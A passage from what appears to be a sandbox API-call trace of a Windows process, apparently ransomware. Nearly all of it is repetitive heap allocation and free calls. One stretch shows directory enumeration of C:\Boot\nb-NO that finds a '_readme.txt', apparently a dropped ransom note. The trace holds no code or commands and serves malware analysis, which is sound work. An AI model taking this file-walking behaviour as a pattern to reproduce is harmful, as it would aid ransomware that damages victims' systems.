lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0094.065] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79fd8 | out: hHeap=0x630000) returned 1 [0094.065] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0094.065] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.065] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa19afca0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa19afca0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0094.066] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.066] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa19afca0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa19afca0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.066] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0094.066] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa19afca0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa19afca0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa19afca0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0094.066] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa19afca0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa19afca0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa19afca0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0094.066] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0094.066] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fd20 | out: hHeap=0x630000) returned 1 [0094.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fd20 [0094.067] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0094.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0094.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x32cf950 [0094.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0094.070] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.070] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.070] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.070] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.070] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.070] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.070] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.071] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.071] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.071] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0094.071] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.071] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.072] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0094.072] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.072] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.072] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.072] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.072] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.072] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.072] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.072] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.072] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.072] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.073] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.073] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.073] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.073] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.073] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.073] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.074] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.074] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.074] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.074] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.074] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.074] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.074] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.074] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.074] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.074] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.074] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.074] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0094.074] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.074] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.074] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.075] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.075] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.075] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.075] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.075] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.075] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.075] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x32cf950 [0094.075] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.075] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.075] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.075] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.075] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.076] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.076] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.076] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.076] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.076] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.076] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.076] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.076] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.076] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.076] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.076] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.076] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.076] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.077] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.077] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.077] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.077] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0094.077] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.077] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.077] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.077] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.077] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0094.077] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.077] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.077] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.077] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0094.077] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.077] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.078] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.078] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.078] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.078] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.078] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.078] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.078] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.078] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.078] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.078] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.078] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.078] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.078] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.078] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.078] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.079] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.079] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.079] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.079] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.079] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.079] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.079] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.079] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.079] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.079] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.079] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.079] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.079] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.079] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0094.080] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.080] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.080] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.080] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.080] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.080] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.081] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.081] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.081] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.081] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.081] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.081] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.081] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.081] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.081] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.081] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.081] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.081] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.081] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.082] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.082] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.082] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0094.082] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.082] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.082] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.082] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.082] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0094.082] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.082] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.082] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.082] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0094.082] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.082] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.082] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.083] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.083] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.083] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.083] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.083] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.083] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.083] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.083] 